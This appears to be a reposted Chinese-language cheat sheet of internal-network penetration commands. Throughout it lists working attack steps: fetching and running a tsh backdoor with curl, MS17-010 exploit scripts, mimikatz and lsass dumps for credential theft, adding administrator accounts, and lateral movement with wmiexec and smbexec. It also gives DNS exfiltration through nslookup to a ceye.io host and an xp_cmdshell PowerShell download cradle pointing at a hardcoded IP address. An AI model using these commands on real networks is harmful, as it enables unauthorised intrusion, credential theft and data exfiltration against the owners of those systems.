内网渗透总结
1、last
可以查看登陆过当前机器的用户的信息,比如用户名、ip、时间等信息。
例子:
2、将错误输出重定向
有时候命令执行的时候,命令执行错误没有具体回显,所以将错误重定向到文件,通过查看文件来判断错误问题。
每次使用同样的命令可以看到不同的结果。比如:
ls /tmp
如何判断负载均衡?使用hostname来判断当前的主机名。
4、tsh上线
curl http://ip:port/tshd -o /tmp/tshd;chmod 777 /tmp/tshd;/tmp/tshd; rm /tmp/tshd
5、fscan
./fscan -h ip -np./fscan -h ip -m ms17010./fscan -h ip/8 查看网段信息。只扫描1和254./fscan -h ip -np -m smb -p 445 -user Administrator -pwd 123456
6、ms17010
check.bat IPms17010.bat IP WIN72K8R2go.bat IP x64
7、
SharpHound.exe -c all
8、
shell net group "Domain Controllers" /domainshell net time /domain
9、
hashdump
10、文件查询
for /r c:/ %i in (*.txt) do @echo %i
11、工具地址
https://github.com/orangetw/tshhttps://docs.microsoft.com/en-us/sysinternals/downloads/procdumphttps://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210531
12、windows常见命令
添加到管理员组 //net localgroup administrators 用户名 /add添加用户 //net user admin admin123 /add
13、Mimikatz
mimikatz.exe ""privilege::debug""""sekurlsa::logonpasswords full"" exit >> log.txtprivilege::debugsekurlsa::logonpasswordsC:>mimikatz.exe ""privilege::debug""""sekurlsa::logonpasswords full"" exit >> log.txtC:>mimikatz.exe ""privilege::debug""""log sekurlsa::logonpasswords full"" exit && dir
14、procedump-注意版本
Procdump.exe -accepteula -ma lsass.exe lsass.dmpsekurlsa::minidump lsass.dmpsekurlsa::logonpasswords
15、redis连接
C:Program FilesRedis
16、
war包制作
jar -cvf test.war text.jsp
解压
jar -xvf shells.war
17、查看域信息
net view /domain
查看某个用户的信息,是否是域管理员,当前用户所在的组。
查看账户修改的密码的时间
查看域用户
18、建立IPC
net use \10.22.33.101ipc$ "p@ssw0rd" /user:"test"
https://www.se7ensec.cn/2020/07/12/内网渗透-基于IPC的横向移动/
19、hash传递
https://opensource-sec.com/2021/01/29/内网渗透之Hash传递攻击/
20、查找exchange
http://k8gege.org/p/FindExchange.html#ip列表
https://github.com/k8gege/LadonGo
21、windows下载文件
certutil -urlcache -split -f [serverURL]
https://mp.weixin.qq.com/s/qAHSe8bVrTlUAbHKUND3jQ
22、查询SPN
setspn -Q */*
setspn -L username/hostname
查找指定用户/主机名注册的SPN
https://rcoil.me/2019/06/【域渗透】SPN 扫描利用
https://yoga7xm.top/2020/02/28/exchange/
https://github.com/maaaaz/impacket-examples-windows/blob/master/smbexec.exe
https://rcoil.me/2019/06/【域渗透】SPN 扫描利用/
https://cloud.tencent.com/developer/article/1562933
https://www.freebuf.com/articles/system/174229.html
https://yoga7xm.top/2020/02/28/exchange/
https://www.jianshu.com/p/aef6dfffeeef
https://blog.riskivy.com/exchange-server-in-pentest/
22、横向移动
wmiexec.exe user:pwd@192.168.1.2smbexec.exe user:pwd@192.168.1.1smbexec.exe 域/user:pwd@192.168.1.1注意:/和
https://pingmaoer.github.io/2020/06/30/域内横向移动二/
23、打包命令
tar cvf 611.tar 611
解压命令
tar xvf 611.tar
23、chrome密码导出
搜索直接输入
chrome://settings/passwords
24、寻找文件
dir /a /s /b d:"*.txt"dir /a /s /b d:"*.xml"dir /a /s /b d:"*.mdb"dir /a /s /b d:"*.sql"dir /a /s /b d:"*.mdf"dir /a /s /b d:"*.eml"dir /a /s /b d:"*.pst"dir /a /s /b d:"*conf*"dir /a /s /b d:"*bak*"dir /a /s /b d:"*pwd*"dir /a /s /b d:"*pass*"dir /a /s /b d:"*login*"dir /a /s /b d:"*user*"
25、谷歌、火狐文件
https://github.com/GhostPack/Seatbelthttps://github.com/carlospolop/winPE/blob/master/binaries/seatbelt/SeatbeltNet3.5AnyCPU.exe
26、文件查找
windows
for /r C: %i in (login.*) do @echo %iwhere /R C: login.*dir /s/a-d/b login.*
linux
find / -name index.phpupdatedb && locate index.php
查找文件内容
findstr /s /i /n /d:C: /c:"123123" *.txt
其中/d:是指定目录,在windows中一般为指定盘符,/c:则是指定文件内容,最后指定的是文件名字。
Linux
find / -name "index.php" | xargs grep "111222"
27、windows命令带出
在windows当中,%cd% 代表的是当前目录,我们通过echo将当前目录写入文本temp,然后荣国certutil对文件内容进行base64编码,再过滤certutil携带的字符,将它赋给一个变量,最后通过nslookup外带出来,从而实现获取当前目录的目的。
echo %cd% > temp&&certutil -encode temp temp1&&findstr /L /V "CERTIFICATE" temp1 > temp2&&set /p ADDR=<temp2&&nslookup %ADDR%.is1lv6.ceye.io
28、密码获取
https://github.com/AlessandroZ/LaZagnehttps://github.com/moonD4rk/HackBrowserData/releases/tag/v0.3.5
xp_cmdshell "powershell.exe -c IEX ((new-object net.webclient).downloadstring("http://47.94.38.147:8000/1.txt"))"
原文始发于微信公众号(0xh4ck3r):内网渗透Trips-1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论